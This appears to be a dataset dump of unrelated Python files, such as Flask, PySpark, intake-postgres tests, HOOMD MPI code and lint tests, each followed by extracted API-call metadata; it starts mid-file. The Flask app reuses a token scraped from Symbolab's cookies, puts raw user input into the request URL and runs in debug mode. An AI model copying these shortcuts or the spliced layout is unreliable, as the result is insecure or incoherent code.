story = talk.story
@story.on(text.Match('going to (.*)', re.IGNORECASE))
def one_story():
@story.part()
def then(ctx):
pass
await talk.ask(None)
def test_serialize_text_match():
m_old = text.Match('hello (.*)', re.IGNORECASE)
m_new = matchers.deserialize(matchers.serialize(m_old))
assert isinstance(m_new, text.Match)
assert m_new.matcher.match('Hello Piter!')
def test_text_qual_should_handle_text():
assert isinstance(matchers.get_validator('just pure text'), text.Equal)
| [
"logging.getLogger"
]
| [((136, 163), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (153, 163), False, 'import logging\n')] |
from flask import Flask
from flask import render_template, request
from flask import jsonify
import requests
import json
app = Flask(__name__)
@app.route("/symbo",methods=['POST'])
def symbo():
#import pdb; pdb.set_trace()
session = requests.session()
token = session.get("https://es.symbolab.com/solver/step-by-step/x%5E%7B2%7D?or=input").cookies.get_dict()["sy2.pub.token"]
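    # Symbolab sets the public-API bearer token in the "sy2.pub.token" cookie on a
    # normal page load; it is reused below when calling the steps endpoint.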
query = request.json["expression"]
#response = json.loads(session.get(f"https://es.symbolab.com/pub_api/steps?subscribed=true&origin=input&language=es&query=%5Cint+tcos%5Cleft(nt%5Cright)dt+&referer=https%3A%2F%2Fes.symbolab.com%2Fsolver%2Fstep-by-step%2F%255Cint_%257B%2520%257Dtcos%255Cleft(nt%255Cright)dt%2520%3For%3Dinput&plotRequest=PlotOptional&page=step-by-step",headers={
response = json.loads(session.get(f"https://es.symbolab.com/pub_api/steps?subscribed=true&origin=input&language=es&query={query}",headers={
"x-requested-with":"XMLHttpRequest",
"authorization":f"Bearer {token}"
}).content)
return {
"dym":response["dym"],
"solutions":response["solutions"]
}
@app.route('/')
def hello():
return render_template('index.html')
app.run(debug=True) | [
"flask.render_template",
"requests.session",
"flask.Flask"
]
| [((128, 143), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (133, 143), False, 'from flask import Flask\n'), ((244, 262), 'requests.session', 'requests.session', ([], {}), '()\n', (260, 262), False, 'import requests\n'), ((1160, 1189), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (1175, 1189), False, 'from flask import render_template, request\n')] |
from pyspark.sql import SparkSession
# spark = SparkSession.builder.master("local[*]").getOrCreate()
spark = SparkSession.builder.getOrCreate()
file_path = "C:\home_work\local_github\Spark-The-Definitive-Guide\data\/flight-data\csv\/2015-summary.csv"
# COMMAND ----------
# COMMAND ----------
flightData2015 = spark\
.read\
.option("inferSchema", "true")\
.option("header", "true")\
.csv("./data/flight-data/csv/2015-summary.csv")
# COMMAND ----------
flightData2015.createOrReplaceTempView("flight_data_2015")
# COMMAND ----------
sqlWay = spark.sql("""
SELECT DEST_COUNTRY_NAME, count(1)
FROM flight_data_2015
GROUP BY DEST_COUNTRY_NAME
""")
dataFrameWay = flightData2015\
.groupBy("DEST_COUNTRY_NAME")\
.count()
sqlWay.explain()
dataFrameWay.explain()
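# Both the SQL query and the DataFrame chain compile to the same underlying
# execution plan, which the two explain() calls above make visible.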
# COMMAND ----------
from pyspark.sql.functions import max, col
#
flightData2015.select(max(col("count"))).show(1)
# COMMAND ----------
maxSql = spark.sql("""
SELECT DEST_COUNTRY_NAME, sum(count) as destination_total
FROM flight_data_2015
GROUP BY DEST_COUNTRY_NAME
ORDER BY sum(count) DESC
LIMIT 5
""")
maxSql.show()
# COMMAND ----------
from pyspark.sql.functions import desc
flightData2015\
.groupBy("DEST_COUNTRY_NAME")\
.sum("count")\
.withColumnRenamed("sum(count)", "destination_total")\
.sort(desc("destination_total"))\
.limit(5)\
.show()
# COMMAND ----------
flightData2015\
.groupBy("DEST_COUNTRY_NAME")\
.sum("count")\
.withColumnRenamed("sum(count)", "destination_total")\
.sort(desc("destination_total"))\
.limit(5)\
.explain()
# COMMAND ----------
| [
"pyspark.sql.functions.col",
"pyspark.sql.SparkSession.builder.getOrCreate",
"pyspark.sql.functions.desc"
]
| [((111, 145), 'pyspark.sql.SparkSession.builder.getOrCreate', 'SparkSession.builder.getOrCreate', ([], {}), '()\n', (143, 145), False, 'from pyspark.sql import SparkSession\n'), ((876, 888), 'pyspark.sql.functions.col', 'col', (['"""count"""'], {}), "('count')\n", (879, 888), False, 'from pyspark.sql.functions import max, col\n'), ((1301, 1326), 'pyspark.sql.functions.desc', 'desc', (['"""destination_total"""'], {}), "('destination_total')\n", (1305, 1326), False, 'from pyspark.sql.functions import desc\n'), ((1507, 1532), 'pyspark.sql.functions.desc', 'desc', (['"""destination_total"""'], {}), "('destination_total')\n", (1511, 1532), False, 'from pyspark.sql.functions import desc\n')] |
import os
import pickle
import pytest
import pandas as pd
from shapely import wkt
from intake_postgres import PostgresSource
from intake import open_catalog
from .util import verify_datasource_interface
TEST_DATA_DIR = 'tests'
TEST_DATA = [
('sample1', 'sample1.csv'),
('sample2_1', 'sample2_1.csv'),
('sample2_2', 'sample2_2.csv'),
]
TEST_GIS_DATA = [
('points', 'sample_points.psql'),
('multipoints', 'sample_multipoints.psql'),
('lines', 'sample_lines.psql'),
('multilines', 'sample_multilines.psql'),
('polygons', 'sample_polygons.psql'),
('multipolygons', 'sample_multipolygons.psql'),
# ('triangles', 'sample_triangles.psql'),
]
TEST_TEMPLATE_DATA = [
'jinja2_params_with_env',
]
@pytest.fixture(scope='module')
def engine():
"""Start docker container for PostgreSQL database, yield a tuple (engine,
metadata), and cleanup connection afterward."""
from .util import start_postgres, stop_postgres
from sqlalchemy import create_engine
stop_postgres(let_fail=True)
local_port = start_postgres()
uri = 'postgresql://postgres@localhost:{}/postgres'.format(local_port)
engine = create_engine(uri)
for table_name, csv_fname in TEST_DATA:
csv_fpath = os.path.join(TEST_DATA_DIR, csv_fname)
df = pd.read_csv(csv_fpath)
df.to_sql(table_name, engine, index=False)
for table_name, psql_fname in TEST_GIS_DATA:
psql_fpath = os.path.join(TEST_DATA_DIR, psql_fname)
with engine.connect() as conn:
with open(psql_fpath, 'r') as fp:
cmds = fp.read().strip().split(';')
for cmd in cmds:
if cmd.strip():
conn.execute(' '.join(cmd.split()))
try:
yield engine
finally:
stop_postgres()
@pytest.mark.parametrize('table_name,_', TEST_DATA)
def test_open(engine, table_name, _):
d = PostgresSource(str(engine.url), 'select * from '+table_name)
assert d.container == 'dataframe'
assert d.description is None
verify_datasource_interface(d)
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_discover(engine, table_name, csv_fpath):
expected_df = pd.read_csv(os.path.join(TEST_DATA_DIR, csv_fpath))
source = PostgresSource(str(engine.url), 'select * from '+table_name)
info = source.discover()
dt = {k: str(v) for k, v in expected_df.dtypes.to_dict().items()}
assert info['dtype'] == dt
assert info['shape'] == (None, 3)
assert info['npartitions'] == 1
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_read(engine, table_name, csv_fpath):
expected_df = pd.read_csv(os.path.join(TEST_DATA_DIR, csv_fpath))
source = PostgresSource(str(engine.url), 'select * from '+table_name)
df = source.read()
assert expected_df.equals(df)
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_discover_after_read(engine, table_name, csv_fpath):
"""Assert that after reading the dataframe, discover() shows more accurate
information.
"""
expected_df = pd.read_csv(os.path.join(TEST_DATA_DIR, csv_fpath))
source = PostgresSource(str(engine.url), 'select * from '+table_name)
info = source.discover()
dt = {k: str(v) for k, v in expected_df.dtypes.to_dict().items()}
assert info['dtype'] == dt
assert info['shape'] == (None, 3)
assert info['npartitions'] == 1
df = source.read()
assert expected_df.equals(df)
info = source.discover()
assert info['dtype'] == dt
assert info['shape'] == (4, 3)
assert info['npartitions'] == 1
assert expected_df.equals(df)
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_close(engine, table_name, csv_fpath):
expected_df = pd.read_csv(os.path.join(TEST_DATA_DIR, csv_fpath))
source = PostgresSource(str(engine.url), 'select * from '+table_name)
source.close()
# Can reopen after close
df = source.read()
assert expected_df.equals(df)
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_pickle(engine, table_name, csv_fpath):
source = PostgresSource(str(engine.url), 'select * from '+table_name)
pickled_source = pickle.dumps(source)
source_clone = pickle.loads(pickled_source)
expected_df = source.read()
df = source_clone.read()
assert expected_df.equals(df)
@pytest.mark.parametrize('table_name,_1', TEST_DATA)
def test_catalog(engine, table_name, _1):
catalog_fpath = os.path.join(TEST_DATA_DIR, 'catalog1.yml')
catalog = open_catalog(catalog_fpath)
ds_name = table_name.rsplit('_idx', 1)[0]
src = catalog[ds_name]
pgsrc = src.get()
pgsrc._uri = str(engine.url)
assert src.describe()['container'] == 'dataframe'
assert src.describe_open()['plugin'] == 'postgres'
assert src.describe_open()['args']['sql_expr'][:6] in ('select', 'SELECT')
metadata = pgsrc.discover()
assert metadata['npartitions'] == 1
expected_df = pd.read_sql_query(pgsrc._sql_expr, engine)
df = pgsrc.read()
assert expected_df.equals(df)
pgsrc.close()
def test_catalog_join(engine):
catalog_fpath = os.path.join(TEST_DATA_DIR, 'catalog1.yml')
catalog = open_catalog(catalog_fpath)
ds_name = 'sample2'
src = catalog[ds_name]
pgsrc = src.get()
pgsrc._uri = str(engine.url)
assert src.describe()['container'] == 'dataframe'
assert src.describe_open()['plugin'] == 'postgres'
assert src.describe_open()['args']['sql_expr'][:6] in ('select', 'SELECT')
metadata = pgsrc.discover()
assert metadata['npartitions'] == 1
expected_df = pd.read_sql_query(pgsrc._sql_expr, engine)
df = pgsrc.read()
assert expected_df.equals(df)
pgsrc.close()
@pytest.mark.parametrize('table_name,_1', TEST_GIS_DATA)
def test_postgis_data(engine, table_name, _1):
from sqlalchemy import MetaData
catalog_fpath = os.path.join(TEST_DATA_DIR, 'catalog1.yml')
catalog = open_catalog(catalog_fpath)
ds_name = table_name
src = catalog[ds_name]
pgsrc = src.get()
pgsrc._uri = str(engine.url)
assert src.describe()['container'] == 'dataframe'
assert src.describe_open()['plugin'] == 'postgres'
assert src.describe_open()['args']['sql_expr'][:6] in ('select', 'SELECT')
metadata = pgsrc.discover()
assert metadata['npartitions'] == 1
meta = MetaData()
meta.reflect(bind=engine)
col_exprs = ['ST_AsText({0}) as {0}'.format(col.name)
for col in meta.tables[table_name].columns]
_query = pgsrc._sql_expr.replace('*', ', '.join(col_exprs))
expected_df = pd.read_sql_query(_query, engine).applymap(
lambda geom: str(wkt.loads(geom))
)
df = pgsrc.read().applymap(lambda geom: str(wkt.loads(geom)))
assert expected_df.equals(df)
pgsrc.close()
@pytest.mark.parametrize('ds_name', TEST_TEMPLATE_DATA)
def test_jinja2(engine, ds_name):
catalog_fpath = os.path.join(TEST_DATA_DIR, 'catalog1.yml')
catalog = open_catalog(catalog_fpath)
src = catalog[ds_name]
pgsrc = src.get()
pgsrc._uri = str(engine.url)
assert src.describe()['container'] == 'dataframe'
assert src.describe_open()['plugin'] == 'postgres'
assert src.describe_open()['args']['sql_expr'][:6] in ('select', 'SELECT')
metadata = pgsrc.discover()
assert metadata['npartitions'] == 1
expected_df = pd.read_sql_query(pgsrc._sql_expr, engine)
df = pgsrc.read()
assert expected_df.equals(df)
pgsrc.close()
| [
"pandas.read_sql_query",
"intake.open_catalog",
"pandas.read_csv",
"pickle.dumps",
"pickle.loads",
"sqlalchemy.create_engine",
"shapely.wkt.loads",
"os.path.join",
"pytest.mark.parametrize",
"sqlalchemy.MetaData",
"pytest.fixture"
]
| [((736, 766), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (750, 766), False, 'import pytest\n'), ((1804, 1854), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,_"""', 'TEST_DATA'], {}), "('table_name,_', TEST_DATA)\n", (1827, 1854), False, 'import pytest\n'), ((2071, 2129), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (2094, 2129), False, 'import pytest\n'), ((2531, 2589), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (2554, 2589), False, 'import pytest\n'), ((2840, 2898), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (2863, 2898), False, 'import pytest\n'), ((3640, 3698), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (3663, 3698), False, 'import pytest\n'), ((4000, 4058), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (4023, 4058), False, 'import pytest\n'), ((4372, 4423), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,_1"""', 'TEST_DATA'], {}), "('table_name,_1', TEST_DATA)\n", (4395, 4423), False, 'import pytest\n'), ((5748, 5803), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,_1"""', 'TEST_GIS_DATA'], {}), "('table_name,_1', TEST_GIS_DATA)\n", (5771, 5803), False, 'import pytest\n'), ((6831, 6885), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""ds_name"""', 'TEST_TEMPLATE_DATA'], {}), "('ds_name', TEST_TEMPLATE_DATA)\n", (6854, 6885), False, 'import pytest\n'), ((1160, 1178), 'sqlalchemy.create_engine', 'create_engine', (['uri'], {}), '(uri)\n', (1173, 1178), False, 'from sqlalchemy import create_engine\n'), ((4203, 4223), 'pickle.dumps', 'pickle.dumps', (['source'], {}), '(source)\n', (4215, 4223), False, 'import pickle\n'), ((4243, 4271), 'pickle.loads', 'pickle.loads', (['pickled_source'], {}), '(pickled_source)\n', (4255, 4271), False, 'import pickle\n'), ((4486, 4529), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', '"""catalog1.yml"""'], {}), "(TEST_DATA_DIR, 'catalog1.yml')\n", (4498, 4529), False, 'import os\n'), ((4545, 4572), 'intake.open_catalog', 'open_catalog', (['catalog_fpath'], {}), '(catalog_fpath)\n', (4557, 4572), False, 'from intake import open_catalog\n'), ((4982, 5024), 'pandas.read_sql_query', 'pd.read_sql_query', (['pgsrc._sql_expr', 'engine'], {}), '(pgsrc._sql_expr, engine)\n', (4999, 5024), True, 'import pandas as pd\n'), ((5153, 5196), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', '"""catalog1.yml"""'], {}), "(TEST_DATA_DIR, 'catalog1.yml')\n", (5165, 5196), False, 'import os\n'), ((5212, 5239), 'intake.open_catalog', 'open_catalog', (['catalog_fpath'], {}), '(catalog_fpath)\n', (5224, 5239), False, 'from intake import open_catalog\n'), ((5627, 5669), 'pandas.read_sql_query', 'pd.read_sql_query', (['pgsrc._sql_expr', 'engine'], {}), '(pgsrc._sql_expr, engine)\n', (5644, 5669), True, 'import pandas as pd\n'), ((5907, 5950), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', '"""catalog1.yml"""'], {}), "(TEST_DATA_DIR, 'catalog1.yml')\n", (5919, 5950), False, 'import os\n'), ((5966, 5993), 'intake.open_catalog', 'open_catalog', 
(['catalog_fpath'], {}), '(catalog_fpath)\n', (5978, 5993), False, 'from intake import open_catalog\n'), ((6375, 6385), 'sqlalchemy.MetaData', 'MetaData', ([], {}), '()\n', (6383, 6385), False, 'from sqlalchemy import MetaData\n'), ((6940, 6983), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', '"""catalog1.yml"""'], {}), "(TEST_DATA_DIR, 'catalog1.yml')\n", (6952, 6983), False, 'import os\n'), ((6999, 7026), 'intake.open_catalog', 'open_catalog', (['catalog_fpath'], {}), '(catalog_fpath)\n', (7011, 7026), False, 'from intake import open_catalog\n'), ((7390, 7432), 'pandas.read_sql_query', 'pd.read_sql_query', (['pgsrc._sql_expr', 'engine'], {}), '(pgsrc._sql_expr, engine)\n', (7407, 7432), True, 'import pandas as pd\n'), ((1243, 1281), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fname'], {}), '(TEST_DATA_DIR, csv_fname)\n', (1255, 1281), False, 'import os\n'), ((1295, 1317), 'pandas.read_csv', 'pd.read_csv', (['csv_fpath'], {}), '(csv_fpath)\n', (1306, 1317), True, 'import pandas as pd\n'), ((1439, 1478), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'psql_fname'], {}), '(TEST_DATA_DIR, psql_fname)\n', (1451, 1478), False, 'import os\n'), ((2210, 2248), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fpath'], {}), '(TEST_DATA_DIR, csv_fpath)\n', (2222, 2248), False, 'import os\n'), ((2666, 2704), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fpath'], {}), '(TEST_DATA_DIR, csv_fpath)\n', (2678, 2704), False, 'import os\n'), ((3094, 3132), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fpath'], {}), '(TEST_DATA_DIR, csv_fpath)\n', (3106, 3132), False, 'import os\n'), ((3776, 3814), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fpath'], {}), '(TEST_DATA_DIR, csv_fpath)\n', (3788, 3814), False, 'import os\n'), ((6617, 6650), 'pandas.read_sql_query', 'pd.read_sql_query', (['_query', 'engine'], {}), '(_query, engine)\n', (6634, 6650), True, 'import pandas as pd\n'), ((6686, 6701), 'shapely.wkt.loads', 'wkt.loads', (['geom'], {}), '(geom)\n', (6695, 6701), False, 'from shapely import wkt\n'), ((6757, 6772), 'shapely.wkt.loads', 'wkt.loads', (['geom'], {}), '(geom)\n', (6766, 6772), False, 'from shapely import wkt\n')] |
import numpy as np
class DataGenerator:
def __init__(self, inputs, shuffle=True, batch_size=32):
assert len(inputs) > 0
self.inputs = inputs
self.idx = np.arange(len(inputs[0]))
self.shuffle = shuffle
self.batch_size = batch_size
self.on_epoch_end()
def data_length(self):
return len(self.idx)
def __len__(self):
n = self.data_length()
len_ = n // self.batch_size
return len_ if n % self.batch_size == 0 else len_ + 1
def __getitem__(self, index):
start = index * self.batch_size
end = start + self.batch_size
index = self.idx[start:end]
data = []
for x in self.inputs:
data.append(x[index])
return data
def on_epoch_end(self):
if self.shuffle:
np.random.shuffle(self.idx)
def set_batch_size(self, batch_size):
self.batch_size = batch_size
def lr_decay(total_epoch, init_lr, split_val):
lr_map = [init_lr] * total_epoch
if len(split_val) > 0:
assert split_val[0][0] > 1
assert split_val[-1][0] <= total_epoch
current_split_index = 0
current_lr = init_lr
next_epoch, next_lr = split_val[current_split_index]
for i in range(total_epoch):
if i < next_epoch - 1:
lr_map[i] = current_lr
else:
current_lr = next_lr
lr_map[i] = current_lr
current_split_index += 1
if current_split_index >= len(split_val):
next_epoch = total_epoch + 1
else:
next_epoch, next_lr = split_val[current_split_index]
def lr_schedule_fn(epoch, lr):
return lr_map[epoch]
return lr_schedule_fn
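# Editor's note: a minimal, self-contained check of lr_decay (assumed usage; the
# returned schedule matches the (epoch, lr) signature expected by Keras-style
# LearningRateScheduler callbacks).
if __name__ == "__main__":
    schedule = lr_decay(total_epoch=10, init_lr=0.1, split_val=[(4, 0.01), (8, 0.001)])
    assert schedule(0, None) == 0.1    # epochs 0-2 keep the initial rate
    assert schedule(3, None) == 0.01   # first drop at epoch index 3
    assert schedule(7, None) == 0.001  # second drop at epoch index 7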
| [
"numpy.random.shuffle"
]
| [((831, 858), 'numpy.random.shuffle', 'np.random.shuffle', (['self.idx'], {}), '(self.idx)\n', (848, 858), True, 'import numpy as np\n')] |
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
import speech_recognition as sr
import nltk
from google_images_download import google_images_download
response = google_images_download.googleimagesdownload()
r = sr.Recognizer()
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
data = r.recognize_google(audio)  # returns str; word_tokenize below needs text, not bytes
print (data)
stopWords = set(stopwords.words('english'))
words = word_tokenize(data)
wordsFiltered = []
for w in words:
if w not in stopWords:
wordsFiltered.append(w)
into_string = " ".join(wordsFiltered)  # join the tokens instead of using the list repr
print(into_string)
arguments = {"keywords":into_string,"limit":2,"print_urls":True} #creating list of arguments
response.download(arguments) #passing the arguments to the function | [
"nltk.corpus.stopwords.words",
"google_images_download.google_images_download.googleimagesdownload",
"nltk.tokenize.word_tokenize",
"speech_recognition.Recognizer",
"speech_recognition.Microphone"
]
| [((203, 248), 'google_images_download.google_images_download.googleimagesdownload', 'google_images_download.googleimagesdownload', ([], {}), '()\n', (246, 248), False, 'from google_images_download import google_images_download\n'), ((253, 268), 'speech_recognition.Recognizer', 'sr.Recognizer', ([], {}), '()\n', (266, 268), True, 'import speech_recognition as sr\n'), ((477, 496), 'nltk.tokenize.word_tokenize', 'word_tokenize', (['data'], {}), '(data)\n', (490, 496), False, 'from nltk.tokenize import sent_tokenize, word_tokenize\n'), ((274, 289), 'speech_recognition.Microphone', 'sr.Microphone', ([], {}), '()\n', (287, 289), True, 'import speech_recognition as sr\n'), ((441, 467), 'nltk.corpus.stopwords.words', 'stopwords.words', (['"""english"""'], {}), "('english')\n", (456, 467), False, 'from nltk.corpus import stopwords\n')] |
# Copyright (c) 2009-2021 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
"""MPI communicator."""
from hoomd import _hoomd
import hoomd
import contextlib
class Communicator(object):
"""MPI communicator.
Args:
mpi_comm: Accepts an mpi4py communicator. Use this argument to perform
many independent hoomd simulations where you communicate between those
simulations using mpi4py.
ranks_per_partition (int): (MPI) Number of ranks to include in a
partition.
`Communicator` initialize MPI communications for a `hoomd.Simulation`. To
use MPI, launch your Python script with an MPI launcher (e.g. ``mpirun`` or
``mpiexec``). By default, `Communicator` uses all ranks provided by the
launcher ``num_launch_ranks`` for a single `hoomd.Simulation` object which
decomposes the state onto that many domains.
Set ``ranks_per_partition`` to an integer to partition launched ranks into
``num_launch_ranks / ranks_per_partition`` communicators, each with their
own `partition` index. Use this to perform many simulations in parallel, for
example by using `partition` as an index into an array of state points to
execute.
"""
def __init__(self, mpi_comm=None, ranks_per_partition=None):
# check ranks_per_partition
if ranks_per_partition is not None:
if not hoomd.version.mpi_enabled:
raise RuntimeError(
"The ranks_per_partition option is only available in MPI.\n"
)
mpi_available = hoomd.version.mpi_enabled
self.cpp_mpi_conf = None
# create the specified configuration
if mpi_comm is None:
self.cpp_mpi_conf = _hoomd.MPIConfiguration()
else:
if not mpi_available:
raise RuntimeError("mpi_comm is not supported in serial builds")
handled = False
# pass in pointer to MPI_Comm object provided by mpi4py
try:
import mpi4py
if isinstance(mpi_comm, mpi4py.MPI.Comm):
addr = mpi4py.MPI._addressof(mpi_comm)
self.cpp_mpi_conf = \
_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(addr)
handled = True
except ImportError:
# silently ignore when mpi4py is missing
pass
# undocumented case: handle plain integers as pointers to MPI_Comm
# objects
if not handled and isinstance(mpi_comm, int):
self.cpp_mpi_conf = \
_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(mpi_comm)
handled = True
if not handled:
raise RuntimeError(
"Invalid mpi_comm object: {}".format(mpi_comm))
if ranks_per_partition is not None:
# check validity
if (self.cpp_mpi_conf.getNRanksGlobal() % ranks_per_partition):
raise RuntimeError('Total number of ranks is not a multiple of '
'ranks_per_partition.')
# split the communicator into partitions
self.cpp_mpi_conf.splitPartitions(ranks_per_partition)
@property
def num_ranks(self):
"""int: The number of ranks in this partition.
When initialized with ``ranks_per_partition=None``, `num_ranks` is equal
to the ``num_launch_ranks`` set by the MPI launcher. When using
partitions, `num_ranks` is equal to ``ranks_per_partition``.
Note:
Returns 1 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getNRanks()
else:
return 1
@property
def rank(self):
"""int: The current rank within the partition.
Note:
Returns 0 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getRank()
else:
return 0
@property
def num_partitions(self):
"""int: The number of partitions in this execution.
Create partitions with the ``ranks_per_partition`` argument on
initialization. Then, the number of partitions is
``num_launch_ranks / ranks_per_partition``.
Note:
Returns 1 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getNPartitions()
else:
return 1
@property
def partition(self):
"""int: The current partition.
Note:
Returns 0 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getPartition()
else:
return 0
def barrier_all(self):
"""Perform a MPI barrier synchronization across all ranks.
Note:
Does nothing in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
_hoomd.mpi_barrier_world()
def barrier(self):
"""Perform a barrier synchronization across all ranks in the partition.
Note:
Does nothing in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
self.cpp_mpi_conf.barrier()
@contextlib.contextmanager
def localize_abort(self):
"""Localize MPI_Abort to this partition.
HOOMD calls ``MPI_Abort`` to tear down all running MPI processes
whenever there is an uncaught exception. By default, this will abort the
entire MPI execution. When using partitions, an uncaught exception on
one partition will therefore abort all of them.
Use the return value of :py:meth:`localize_abort()` as a context manager
to tell HOOMD that all operations within the context will use only
that MPI communicator so that an uncaught exception in one partition
will only abort that partition and leave the others running.
"""
global _current_communicator
prev = _current_communicator
_current_communicator = self
yield None
_current_communicator = prev
# store the "current" communicator to be used for MPI_Abort calls. This defaults
# to the world communicator, but users can opt in to a more specific
# communicator using the Device.localize_abort context manager
_current_communicator = Communicator()
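# Editor's usage sketch (assumption, not part of the original module): with an MPI
# launch such as `mpirun -n 4 python script.py`, splitting the ranks into two
# independent 2-rank partitions might look like this:
#
#     communicator = Communicator(ranks_per_partition=2)
#     state_points = [1.0, 2.0]                     # hypothetical per-partition inputs
#     kT = state_points[communicator.partition]     # partition index selects the input
#     with communicator.localize_abort():
#         ...  # build and run a hoomd.Simulation for this partition's state point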
| [
"hoomd._hoomd.MPIConfiguration",
"hoomd._hoomd.MPIConfiguration._make_mpi_conf_mpi_comm",
"hoomd._hoomd.mpi_barrier_world",
"mpi4py.MPI._addressof"
]
| [((1818, 1843), 'hoomd._hoomd.MPIConfiguration', '_hoomd.MPIConfiguration', ([], {}), '()\n', (1841, 1843), False, 'from hoomd import _hoomd\n'), ((5167, 5193), 'hoomd._hoomd.mpi_barrier_world', '_hoomd.mpi_barrier_world', ([], {}), '()\n', (5191, 5193), False, 'from hoomd import _hoomd\n'), ((2718, 2775), 'hoomd._hoomd.MPIConfiguration._make_mpi_conf_mpi_comm', '_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm', (['mpi_comm'], {}), '(mpi_comm)\n', (2765, 2775), False, 'from hoomd import _hoomd\n'), ((2203, 2234), 'mpi4py.MPI._addressof', 'mpi4py.MPI._addressof', (['mpi_comm'], {}), '(mpi_comm)\n', (2224, 2234), False, 'import mpi4py\n'), ((2301, 2354), 'hoomd._hoomd.MPIConfiguration._make_mpi_conf_mpi_comm', '_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm', (['addr'], {}), '(addr)\n', (2348, 2354), False, 'from hoomd import _hoomd\n')] |
import _ast
from peon.src.project.file.function_def.function import FunctionLint
class ReflectionAtLineFixture:
empty_node = _ast.Pass
is_instance_at_first_lvl = _ast.FunctionDef(id='isinstance', lineno=1)
type_at_first_lvl = _ast.FunctionDef(id='type', lineno=1)
is_instance_at_second_lvl = _ast.FunctionDef(body=[_ast.Expr(id='isinstance', lineno=2)], lineno=1)
type_at_second_lvl = _ast.FunctionDef(body=[_ast.Expr(id='type', lineno=2)], lineno=1)
def test_empty_node():
assert FunctionLint(
definition=ReflectionAtLineFixture.empty_node,
).reflection_at_line() == tuple()
def test_is_instance_at_first_lvl():
assert FunctionLint(
definition=ReflectionAtLineFixture.is_instance_at_first_lvl,
).reflection_at_line() == (1,)
def test_type_at_first_lvl():
assert FunctionLint(
definition=ReflectionAtLineFixture.type_at_first_lvl,
).reflection_at_line() == (1,)
def test_is_instance_at_second_lvl():
assert FunctionLint(
definition=ReflectionAtLineFixture.is_instance_at_second_lvl,
).reflection_at_line() == (2,)
def test_type_at_second_lvl():
assert FunctionLint(
definition=ReflectionAtLineFixture.type_at_second_lvl,
).reflection_at_line() == (2,)
| [
"_ast.Expr",
"_ast.FunctionDef",
"peon.src.project.file.function_def.function.FunctionLint"
]
| [((173, 216), '_ast.FunctionDef', '_ast.FunctionDef', ([], {'id': '"""isinstance"""', 'lineno': '(1)'}), "(id='isinstance', lineno=1)\n", (189, 216), False, 'import _ast\n'), ((241, 278), '_ast.FunctionDef', '_ast.FunctionDef', ([], {'id': '"""type"""', 'lineno': '(1)'}), "(id='type', lineno=1)\n", (257, 278), False, 'import _ast\n'), ((334, 370), '_ast.Expr', '_ast.Expr', ([], {'id': '"""isinstance"""', 'lineno': '(2)'}), "(id='isinstance', lineno=2)\n", (343, 370), False, 'import _ast\n'), ((431, 461), '_ast.Expr', '_ast.Expr', ([], {'id': '"""type"""', 'lineno': '(2)'}), "(id='type', lineno=2)\n", (440, 461), False, 'import _ast\n'), ((510, 569), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.empty_node'}), '(definition=ReflectionAtLineFixture.empty_node)\n', (522, 569), False, 'from peon.src.project.file.function_def.function import FunctionLint\n'), ((667, 740), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.is_instance_at_first_lvl'}), '(definition=ReflectionAtLineFixture.is_instance_at_first_lvl)\n', (679, 740), False, 'from 